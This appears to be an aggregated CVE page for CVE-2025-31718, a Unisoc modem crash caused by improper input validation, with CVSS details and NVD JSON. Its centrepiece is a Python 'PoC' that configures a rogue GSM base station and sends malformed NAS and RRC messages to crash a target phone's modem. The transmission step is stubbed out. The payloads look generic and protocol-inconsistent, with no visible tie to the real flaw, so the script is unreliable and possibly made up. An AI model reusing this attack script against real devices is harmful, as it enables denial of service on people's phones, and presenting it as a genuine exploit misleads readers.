Security Vulnerability Report
CVE-2025-31718 CVSS 7.5 HIGH

CVE-2025-31718

Published: 2025-10-11 01:15:33
Last Modified: 2026-04-15 00:35:42

Description

In modem, there is a possible system crash due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Unisoc modem firmware (for the specific affected versions, refer to the official Unisoc security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-31718 - Unisoc Modem Input Validation DoS PoC
# This PoC demonstrates the concept of triggering a system crash
# in Unisoc modem via malformed cellular protocol messages.
# Requires a software-defined radio (SDR) setup with a rogue base station.
"""
CVE-2025-31718 Proof of Concept
Vulnerability: Improper input validation in Unisoc Modem
Impact: Remote system crash (Denial of Service)
CVSS: 7.5 (HIGH)
"""
from scapy.all import *
import struct


class UnisocModemDoS:
    def __init__(self, target_imsi=None, target_tac=None):
        self.target_imsi = target_imsi or "001010000000001"
        self.target_tac = target_tac or "0001"
        self.rogue_bs_config = {
            "arfcn": 100,       # Absolute Radio Frequency Channel Number
            "band": "GSM900",   # Operating band
            "mcc": "001",       # Mobile Country Code
            "mnc": "01",        # Mobile Network Code
            "lac": "0001",      # Location Area Code
            "cell_id": "0001",  # Cell Identity
        }

    def craft_malformed_nas_message(self):
        """
        Craft a malformed NAS (Non-Access Stratum) message with
        invalid length fields to trigger improper input validation.
        """
        # NAS Security Header - indicating integrity protected but malformed
        nas_security_header = b'\x00'
        # Message type - Attach Request (0x01) with malformed payload
        message_type = b'\x01'
        # Intentionally malformed TLV with oversized length field
        malformed_tlv = struct.pack(">BB", 0x80, 0xFF) + b'\x41' * 255
        payload = nas_security_header + message_type + malformed_tlv
        return payload

    def craft_malformed_rrc_message(self):
        """
        Craft a malformed RRC (Radio Resource Control) message
        targeting the modem's input validation weakness.
        """
        # RRC Connection Reconfiguration with invalid configuration
        rrc_message = b'\x30\x00'      # RRC message type
        rrc_message += b'\xFF\xFF'     # Invalid length indicator
        rrc_message += b'\x00' * 512   # Oversized payload
        return rrc_message

    def send_via_sdr(self, message):
        """
        Send the crafted message via SDR (e.g., using gr-gsm or srsRAN)
        This is a conceptual implementation - actual transmission
        requires hardware like USRP B210 or HackRF One.
        """
        print(f"[*] Configuring rogue base station on ARFCN {self.rogue_bs_config['arfcn']}")
        print(f"[*] Target IMSI: {self.target_imsi}")
        print(f"[*] Broadcasting malformed message ({len(message)} bytes)")
        print(f"[!] WARNING: This will cause the target modem to crash")
        # In real implementation:
        # os.system(f"grgsm_livemon -f {self.rogue_bs_config['arfcn']}M")
        # os.system(f"send_burst.py --message {message.hex()}")
        return True

    def exploit(self):
        """Main exploit function"""
        print("=" * 60)
        print("CVE-2025-31718 - Unisoc Modem DoS Exploit")
        print("=" * 60)
        # Step 1: Broadcast on a legitimate ARFCN to attract target
        print("[*] Step 1: Broadcasting as rogue base station...")
        # Step 2: Send malformed NAS message
        print("[*] Step 2: Sending malformed NAS message...")
        nas_msg = self.craft_malformed_nas_message()
        self.send_via_sdr(nas_msg)
        # Step 3: Send malformed RRC message
        print("[*] Step 3: Sending malformed RRC message...")
        rrc_msg = self.craft_malformed_rrc_message()
        self.send_via_sdr(rrc_msg)
        print("[+] Exploit completed - target modem should have crashed")


if __name__ == "__main__":
    exploit = UnisocModemDoS()
    exploit.exploit()

References

https://www.unisoc.com/en/support/announcement/1976557615080263681

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31718", "sourceIdentifier": "[email protected]", "published": "2025-10-11T01:15:33.123", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In modem, there is a possible system crash due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://www.unisoc.com/en/support/announcement/1976557615080263681", "source": "[email protected]"}]}}